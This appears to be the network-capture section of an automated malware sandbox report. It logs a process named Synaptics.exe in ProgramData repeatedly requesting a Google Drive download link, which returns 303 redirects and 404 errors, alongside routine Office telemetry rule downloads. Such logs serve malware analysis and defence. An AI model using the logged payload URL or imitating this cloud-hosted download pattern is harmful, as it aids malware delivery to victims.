                                                                                        2024-12-05 21:50:31 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.549803142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:32 UTC1246INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qH4YQ2Pvljzm-jI3woo2MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4MOWu-6nP2OGgwDAAZwYwzhaZ1Hc7DoGBK3pT36XBruN0NmvathgaJ95c2oWHedJb9dr0
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:32 UTC144INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404
                                                                                        2024-12-05 21:50:32 UTC1390INData Raw: 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 66 72 4c 4b 62 6e 61 66 59 5a 55 37 62 69 5a 4a 46 39 71 58 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64
                                                                                        Data Ascii: (Not Found)!!1</title><style nonce="TfrLKbnafYZU7biZJF9qXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padd
                                                                                        2024-12-05 21:50:32 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.549804172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:32 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WLdSXUhO5AdPsjVFhMLkqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.549805142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:33 UTC1253INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TMUZdAanDokDjil0oUsAmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6yM_zTEqldBD0XIA95jjEoq4Cz36jt7biocueOStF7oh6pSVQHJgM-ePwDkXN2Ac-uHbnA9hzEoA
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:33 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:33 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6d 75 4e 54 62 78 35 69 4b 54 31 4e 6f 41 6d 79 46 6c 44 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="KmuNTbx5iKT1NoAmyFlDZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:33 UTC125INData Raw: 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.549802172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:32 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:33 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GR0SWAN3G9q-1wx3ZZr4SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        48192.168.2.54980613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:32 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 499
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                        x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bdjrnwqhC1EWRpg2800000003dg000000005xku
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        49192.168.2.54980813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:32 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                        x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bdw2rg8hC1EWR11u400000003ng000000003ac1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        50192.168.2.54980713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:32 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                        x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bd7wvgbhC1EWR0rgs00000003dg000000003zpr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        51192.168.2.54980913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:32 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                        x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bd77mkmhC1EWR5efc00000003f000000000v6g3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        52192.168.2.54981413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:33 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8972972"
                                                                                        x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215033Z-1746fd949bd4w8sthC1EWR700400000003300000000085kk
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
